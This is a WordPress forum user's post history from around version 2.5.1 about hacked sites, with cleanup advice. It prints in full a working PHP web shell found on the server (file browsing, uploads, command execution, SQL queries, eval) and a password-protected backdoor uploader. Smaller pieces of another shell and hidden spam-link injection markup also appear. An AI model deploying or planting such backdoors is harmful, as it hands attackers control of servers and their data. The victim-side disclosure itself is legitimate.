Mobster
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: WordPress keeps breaking No clue whats wrongWell… My file actually was some sort of redirect for the admin. It had a password associated with it that allowed the attacker to edit my files. Not sure about yours.
Forum: Fixing WordPress
In reply to: WordPress keeps breaking No clue whats wrongI had a site, no lie, that was hacked within a week on a brand new server brand new domain, brand new install.
I think they robot WordPress for it’s vulnerabilities. I might be crazy but, that’s the only way someone could have possibly found my new site that was hacked.
Don’t kid yourself by thinking WordPress is hackersafe. No matter how new the site is.
I’d love to see that .htaccessbak file (edited for safety of course)
Forum: Fixing WordPress
In reply to: WordPress keeps breaking No clue whats wrongIf that is anything like mine, it overrides your admin privileges and allows the hacker to edit basically any file they choose.
I’m not 100% positive but, I’m pretty certain that is not a default WordPress .htaccess file.
I just posted this in another forum.
I just repaired a major hacked site myself. It was a complete pain in my ass.
Look for .htaccess.addHandlerBak or any .htaccess that doesn’t belong there and delete it immediately!
Because NOONE responded to any of my requests, I will only tell you what I found on my server. As you can see here HERE
Your file changes look almost identical to mine and the hackers added files throughout my server that mirrored certain files in my directory but added a prefix to the file, Mine was fx_
Through these files and the .htaccess.addHandlerBak they essentially had overridden my admin privileges and made their own through .htaccess. They also uploaded some sort of admin panel of their own (eval script) I believe, that gave them full reign of my main directory and mysql database as well.
I would suggest backing up your current theme, database and completely delete ALL current files on your host and uploading a fresh install of WordPress 2.5.1.
Be sure to double, tipple check your theme for files you don’t recognize and delete those files before uploading to the server. Otherwise it’s a backdoor for them to get back in.
I also read somewhere to add an index.html file to your plugins directory to prevent hackers from browsing that directory. (A sort of dumb thing for WordPress to leave out in my opinion)
Browse MySql wp_options / current_plugins for any suspicious looking code that pertains to uploads or .jpg images.
Check all of your uploads in your current theme for any file you don’t recognize and delete.
Also, Look here , you might find a few things that help (even though It didn’t help me much)
Also, if your hosting company offers fantastico wordpress setup and you do a manual install. I found out that the old version installed on fantastico can be hack which compromises your current (up to date) installation.
You might want to contact your hosting company to see if your server has been compromised in any way.
Good luck.
Forum: Fixing WordPress
In reply to: WordPress keeps breaking No clue whats wrongDid you look for any other ,htaccess files that are named something different?
Like this .htaccess.addHandlerBak?
Just curious.
And another thing, Why the hell would a CMS like WordPress allow this type of activity? Clearly, by default, .htaccess should not allow someone to browse file like this.
I just repaired a major hacked site myself. It was a complete pain in my ass.
Look for .htaccess.addHandlerBak or any .htaccess that doesn’t belong there and delete it immediately!
Because NOONE responded to any of my requests, I will only tell you what I found on my server. As you can see here HERE
Your file changes look almost identical to mine and the hackers added files throughout my server that mirrored certain files in my directory but added a prefix to the file, Mine was fx_
Through these files and the .htaccess.addHandlerBak they essentially had overridden my admin privileges and made their own through .htaccess. They also uploaded some sort of admin panel of their own (eval script) I believe, that gave them full reign of my main directory and mysql database as well.
I would suggest backing up your current theme, database and completely delete ALL current files on your host and uploading a fresh install of WordPress 2.5.1.
Be sure to double, tipple check your theme for files you don’t recognize and delete those files before uploading to the server. Otherwise it’s a backdoor for them to get back in.
I also read somewhere to add an index.html file to your plugins directory to prevent hackers from browsing that directory. (A sort of dumb thing for WordPress to leave out in my opinion)
Browse MySql wp_options / current_plugins for any suspicious looking code that pertains to uploads or .jpg images.
Check all of your uploads in your current theme for any file you don’t recognize and delete.
Also, Look here , you might find a few things that help (even though It didn’t help me much)
Good luck.
Forum: Fixing WordPress
In reply to: what is .htaccess.addHandlerBak?Maybe an upper level Dev could please respond?
I found this on my server.
<?php #------------------Security------------------# $name_c = "checkIndentity"; function get_c($name_c){ foreach($_COOKIE as $key=>$value) { if ($key == $name_c) return $c = $value; else return false; } } function is_cookie ($search_cookie) { foreach($_COOKIE as $key=>$value) { if ($value == $search_cookie) return true; else return false; } } if (md5($_REQUEST['p']) == "1b0ca22694b8eb1303af4d535bc15df7" || is_cookie(get_c($name_c))){ if(!is_cookie(get_c($name_c))) setcookie("checkIndentity",md5($_REQUEST['p'])); #------------------END Security------------------# ################################################## #------------------Private Class------------------# class browseDir { var $pwd; var $newLocation; function browseDir(){ $d=$this->pwd = getcwd(); $this->changeDir($d); } function upload($ifupload){ if(isset($ifupload)){ $uploadfile = getcwd().'/'.basename($_FILES['uploadfile']['name']); if (! move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile)){ print "Unable to move ". $_FILES['uploadfile']['tmp_name']." file to<br />$uploadfile<br />"; } if (file_exists($uploadfile)) @chmod($uploadfile, 0777); } } function changeDir ($dir){ $dir=trim($dir); @chdir($this->pwd); if (!file_exists($dir)){print "$dir: No such file or directory<br />\n";return;} if (!@chdir($dir)) {print "$dir: Failed<br />\n";return;} return $this->pwd = getcwd(); } function getDirList($newLocation=''){ $handle = ''; $self = $_SERVER['PHP_SELF']; if (empty($this->newLocation) && $this->newLocation == ''){ $_SESSION['lastchg'] = '.'; $handle = @opendir($this->pwd); if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';} $dirs = array(); $files = array(); while (false !== ($file = @readdir($handle))) { if ($file != ".") { if (is_dir($file)) $dirs[] = $file; else $files[] = $file; } } } if (!empty($this->newLocation) && $this->newLocation != ''){ if(isset($_SESSION['lastchg'])) { $this->pwd = &$_SESSION['lastchg']; $_SESSION['lastchg'] = $this->changeDir($this->newLocation); } if(empty($_SESSION['lastchg'])) $_SESSION['lastchg'] = $this->changeDir($this->newLocation); } $handle = @opendir($this->pwd); if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';} $dirs = array(); $files = array(); while (false !== ($file = @readdir($handle))) { if ($file != ".") { if (is_dir($file)){ $dirs[] = $file; } else { $files[] = $file; } } } @closedir($handle); natcasesort($files); natcasesort($dirs); print '<tr><td valign="top">'; print '<i>'.getcwd().'</i><br />'; print '<hr><br />'; foreach ($dirs as $d){ print '<a href="?command='.urlencode($d).'">'.htmlentities($d)."</a><br />\n"; } print '<hr/>'; foreach ($files as $f){ if (is_readable($f)) print '<a target="_blank" href="'.$_SERVER['PHP_SELF'].'/'.urlencode($f).'?getfile='. urlencode($f).'">'.htmlentities($f).'</a>'; else print htmlentities($f); print "<br />\n"; } print "<br />\n"; print "<br />\n"; if (is_writeable(getcwd())){ print '<form enctype="multipart/form-data" action="'.$self.'" method="post">'; print '<input type="file" name="uploadfile" />'; print '<input type="submit" name="submit" value="Upload" />'; print '</form>'; } print "</td><td>"; } function showFile ($fname,$escapeOutput = true){ if(empty($this->pwd) && $this->pwd=='') $this->pwd = '.'; $fullpath = $_SESSION['lastchg']."/$fname"; $ctype = 'text/plain'; if (! is_readable($fullpath)){print "Unable to read $fullpath";return;} if ($ctype == 'text/html' && $escapeOutput) header("Content-type: text/plain\r\n\r\n"); else header( "Content-type: $ctype\r\n\r\n"); if($fh=@fopen($fullpath,'r')){ $code=@fread($fh,filesize($fullpath)); @fclose($fh); echo $code; }else readfile($fullpath); } function send_file($dist_name='') { ob_end_clean(); /*$e = split("/", strrev($dist_name), 2); $name = strrev($e[0]); $distination = strrev($e[1]); $path = $distination."/".$name;*/ if(empty($this->pwd) && $this->pwd == '') $this->pwd = '.'; $path = $this->pwd."/$dist_name"; if (!is_file($path) or connection_status()!=0) return(FALSE); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); header("Expires: ".gmdate("D, d M Y H:i:s", mktime(date("H")+2, date("i"), date("s"), date("m"), date("d"), date("Y")))." GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Content-Type: application/octet-stream"); header("Content-Length: ".(string)(filesize($path))); header("Content-Disposition: inline; filename=".str_replace(" ","",$name)); header("Content-Transfer-Encoding: binary\n"); if ($file = fopen($path, 'rb')) { while(!feof($file) and (connection_status()==0)) { print(fread($file, 1024*8)); flush(); } fclose($file); } return((connection_status()==0) and !connection_aborted()); } function shh_curPageURL() { global $SLASHSTR; $pageURL = 'http'; //if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";} $pageURL .= "://"; if ($_SERVER["SERVER_PORT"] != "80") { $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]; } else { $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; } if(!strstr($pageURL, $SLASHSTR)){ if(strpos($pageURL, '?')){$pageURL.="&$SLASHSTR";}else{$pageURL.="?$SLASHSTR";} } return $pageURL; } function print_a( $TheArray ){ echo "<table border="1">\n"; $Keys = array_keys( $TheArray ); foreach( $Keys as $OneKey ){ echo "<tr>\n"; echo "<td bgcolor="'#727450'">"; echo "<B>" . $OneKey . "</B>"; echo "</td>\n"; echo "<td bgcolor="'#C4C2A6'">"; if ( is_array($TheArray[$OneKey]) ) $this->print_a($TheArray[$OneKey]); else echo $TheArray[$OneKey]; echo "</td>\n"; echo "</tr>\n"; } echo "</table>\n"; } } #------------------END Private Class------------------# ####################################################### #------------------Define Variables------------------# $isupload = $_REQUEST['submit']; $SLASHSTR='sht=%22'; $openFile = '';if(isset($_REQUEST['getfile'])){$openFile=trim($_REQUEST['getfile']);} $shhptr='';if(isset($_REQUEST['shhptr'])){$shhptr=trim($_REQUEST['shhptr']);} // print_r($_REQUEST); $_SESSION['button'] = $shhptr;$page = $_SESSION['button']; $newLocation='';if(isset($_REQUEST['command'])){$newLocation=trim($_REQUEST['command']);} $cmd='';if(isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);} $shhcmd='';if(isset($_REQUEST['shhcmd'])){$shhcmd=trim($_REQUEST['shhcmd']);} $shhqry='';if(isset($_REQUEST['shhqry'])){$shhqry=trim($_REQUEST['shhqry']);} $sdbhst='';if(isset($_REQUEST['sdbhst'])){$sdbhst=trim($_REQUEST['sdbhst']);} $sdbusr='';if(isset($_REQUEST['sdbusr'])){$sdbusr=trim($_REQUEST['sdbusr']);} $sdbpsw='';if(isset($_REQUEST['sdbpsw'])){$sdbpsw=trim($_REQUEST['sdbpsw']);} $sdbsch='';if(isset($_REQUEST['sdbsch'])){$sdbsch=trim($_REQUEST['sdbsch']);} $shhcod='';if(isset($_REQUEST['shhcod'])){$shhcod=trim($_REQUEST['shhcod']);} $shhx='no';if(isset($_REQUEST['shhx'])){$shhx=trim($_REQUEST['shhx']);} $shhfnm='';if(isset($_REQUEST['shhfnm'])){$shhfnm=trim($_REQUEST['shhfnm']);} $slashtest=false;if(isset($_REQUEST['sht'])){$slashtest=trim($_REQUEST['sht']);} if(($slashtest!=false)&&($slashtest!='')){if($slashtest==='\"'){ $shhcod = stripslashes($shhcod); $shhcmd = stripslashes($shhcmd); $shhqry = stripslashes($shhqry); }} #------------------END Define Variables------------------# ########################################################## $browser = new browseDir(); session_start(); if($openFile!='') {$browser->showFile($openFile);exit;} ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <SCRIPT type="text/javascript"> function submitform(num){ var num; document.theshll.shhptr.value = num; document.theshll.submit(); } </SCRIPT> <style type="text/css"> input{color:#2EFE2E;background-color:black;margin:3px;} textarea{border-color:white;color:#2EFE2E;background-color:black;margin:3px;} body{color:white;background-color:black;} a{color:white;} td{border-color:white;color:#2EFE2E;background-color:black;margin:1px;} th{color:green;} </style> </head> <body> <? if($shhptr == 0 || $shhptr == ''){?> <table border="1" align="left" > <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="theshll" id="theshll"> <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" /> <input type="button" name="1" value="SQL" onmousedown="submitform(1);" /> <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" /> <tr> <th>CurrentDirectoryListing</th> <td><input align="left" type="text" name="cmd" size="60" /> <input type="submit" value="EXECUTE" /></td> </tr> </form> <?php $browser->newLocation = $newLocation;$browser->upload($isupload); $browser->getDirList(); echo"<textarea wrap=\"off\" readonly rows=\"20\" cols=\"90\">"; if(($shhptr=='')&&($cmd!='')){ if(passthru($cmd, $out)){ echo htmlentities(implode("\n",$out)); } } echo "</textarea></td></tr>"; ?> </table> <?}?> <?if(($page=='1')){?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="theshll" id="theshll"> <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" /> <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" /> <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" /> <div style="width: 600px;"> <div style="float:left;"> <input type="text" name="sdbhst" size="20" value="<?php echo $sdbhst; ?>" />.::Host:. <br /> <input type="text" name="sdbsch" size="20" value="<?php echo $sdbsch; ?>" />.::DB:.</div> <div style="margin-left:20px;float:left;"> <input type="text" name="sdbusr" size="20" value="<?php echo $sdbusr; ?>" />.::User:.<br /> <input type="text" name="sdbpsw" size="20" value="<?php echo $sdbpsw; ?>" />.::Pass:.</div> <input type="text" name="shhqry" size="80" value="<?php echo $shhqry; ?>" /> <input type="submit" value="QUERY" /></form> <?php echo "<table>"; if(($shhptr=='1')&&($shhqry!='')){ if ($mysql = @mysql_connect($sdbhst, $sdbusr, $sdbpsw)){ if(@mysql_select_db($sdbsch)) { if($res = @mysql_query($shhqry)){ if($row = mysql_fetch_assoc($res)){ while($row = mysql_fetch_assoc($res)){ $arr[] = $row; } $browser->print_a($arr); } } else echo "mysql query error: ".mysql_error()."\n"; } else echo "mysql select error: ".mysql_error()."\n"; @mysql_close($mysql); } else echo "mysql connect error: ".mysql_error()."\n"; } echo "</table>"; } if(($page=='2')){ ?> <form action="<?php echo $browser->shh_curPageURL(); ?>" method="post" name="theshll" id="theshll"> <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" /> <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" /> <input type="button" name="2" value="SQL" onmousedown="submitform(1);" /> <br /> <input type="text" name="shhfnm" size="40" value="<?php echo $shhfnm; ?>" /> <input type="submit" name="shhx" value="SAVE AS" /> <input type="submit" name="shhx" value="INCLUDE/RUN" /><br /> <input type="submit" name="shhx" value="EVALUATE" /><br /> <textarea name="shhcod" wrap="off" rows="15" cols="65" > <?php echo $shhcod;?> </textarea> </form> <?php echo "<div id=\"reslt\">"; switch($shhx){ case 'EVALUATE': if($shhcod!=''){ ob_start(); eval($shhcod); $eval=ob_get_contents(); ob_end_clean(); } else { ob_start(); echo "Enter PHP code!"; $eval=ob_get_contents(); ob_end_clean(); } break; case 'SAVE AS': if($shhfnm!=''){ $f = @fopen($shhfnm, 'w'); if($f){ if(strpos($shhcod, '<?php')===false){ $shhcodz = "<?php\n".$shhcod."\n".'?'.'>'; } else $shhcodz = $shhcod; fwrite($f, $shhcodz); fclose($f); echo "Saved."; } else echo "Cannot write file!\n"; } else echo "Enter file name!\n"; break; case 'INCLUDE/RUN': if($shhfnm!=''){ if (!@include($shhfnm)){ echo "Include error!"; }; } else echo "Enter file name!\n"; break; } if(!empty($eval) && $eval != ''){ echo '<table align="left" border="0" >'; echo '<th align="center">EVAL OUTPUT:</th>'; echo '</table><br />'; echo '<br />'; echo '<table align="left" border="1" width="48%" height="30%">'; echo '<tr><td align="center">'.$eval.'</td></tr>'; echo '</table>'; } } ?> <th ></th> </body></html> <?}?>Forum: Fixing WordPress
In reply to: got hackedHas anyone come up with a solution to this? I had this very thing happen to me recently. It seems there are allot of threads like this that go unanswered.
My files all began with fx_
How should I check my database to make sure none of this is polluting that as well?
Forum: Fixing WordPress
In reply to: what is .htaccess.addHandlerBak?I found files with this code all throughout my site.
<?php @error_reporting(E_ALL); @set_time_limit(0); global $HTTP_SERVER_VARS; define('PASSWD','their password not mine?'); function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("mark_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"]) == PASSWD) { if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"), $HTTP_POST_FILES["s"]["size"])) { if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code)) { testdata('save_ok'); }; //eval($code); } else { testdata('save_fail'); }; if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) { eval($code); testdata('ok'); } else { testdata('fail'); }; } else { testdata('pass'); }; testdata('end'); echo "</pre>"; ?>Forum: Fixing WordPress
In reply to: what is .htaccess.addHandlerBak?Any more details on this?
Forum: Fixing WordPress
In reply to: Site Hacked over and over WordPress 2.5.1 Please Help!Man, had I found this a week ago it would have saved me some time.
This plug-in found a couple problems right off the bat.
It detected this in my upload directory. (I wont post the whole thing but what the???)
2008.php
error_reporting(7); @set_magic_quotes_runtime(0); ob_start(); $mtime = explode(' ', microtime()); $starttime = $mtime[1] + $mtime[0]; define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/'); //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 ); define('IS_WIN', DIRECTORY_SEPARATOR == '\\'); define('IS_COM', class_exists('COM') ? 1 : 0 ); define('IS_GPC', get_magic_quotes_gpc());And this:
fx__2008.php
<?php @error_reporting(E_ALL); @set_time_limit(0); global $HTTP_SERVER_VARS; define('PASSWD',' ##$#@!! ( I removed this for obvious reasons) '); function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("mark_$t")); }; echo "<pre>"; testdata('start');Forum: Fixing WordPress
In reply to: Site Hacked over and over WordPress 2.5.1 Please Help!Thanks Flammo,
All permissions appear to be set correctly. I checked this yesterday.
I found these users in phpmyAdmin as recent members:
pornvigra[at]gmail.com
canadapharma[at]izmail.net
Also, users have been complaining about not being able to login. A couple people told me their passwords weren’t working and when they try to get a new one it won’t work either.
I get this when I request one /wp-login.php?action=rp&key=us4mN!AG!RS^
I think my database has been hacked.
Forum: Fixing WordPress
In reply to: Site Hacked over and over WordPress 2.5.1 Please Help!Well… it’s my header that’s being hacked.
This appears right after the <body> tag. It positions them out of view but they’re there. Even when I delete them they come back.
How are they accessing my header.php >? Any suggestions?
This is what it looks like.
<!--linksb--> <div style="position:absolute; left:-1130px; top:-1003px;"> <a href="http://www.news.appstate.edu/wp-content/uploads/.thumbs/viagra/viagra.html">viagra </a> <a href="http://www.news.appstate.edu/wp-content/uploads/.thumbs/viagra/viagra-pills.html">viagra pills buy</a> +hundreds more links.................................... <!--linkse-->What the?????
Forum: Fixing WordPress
In reply to: defining excerpt character countNever mind, I found it in functions.php
function wp_trim_excerpt($text) { // Fakes an excerpt if needed if ( '' == $text ) { $text = get_the_content(''); $text = apply_filters('the_content', $text); $text = str_replace(']]>', ']]>', $text); $text = strip_tags($text); $excerpt_length = 95; // <----------------------- here it is $words = explode(' ', $text, $excerpt_length + 1); if (count($words) > $excerpt_length) { array_pop($words); array_push($words, '[...]'); $text = implode(' ', $words); } } return $text; }Forum: Fixing WordPress
In reply to: Hacked By Kingworm?(Version 2.3.2)
Forum: Fixing WordPress
In reply to: Hacked By Kingworm?Sorry for the double post but… you can’t tell me I’m the only guy hacked by this ?
If a mod doesn’t want to reply to this because of it’s sensitive nature, feel free to email me at denny[at]sydpixel.com.
I’m a little concerned that this is going to happen to all of my sites and would like to know if there has been any effort put into combating this, or if there is anything I can do immediately that may prevent it from happening again.
Thank You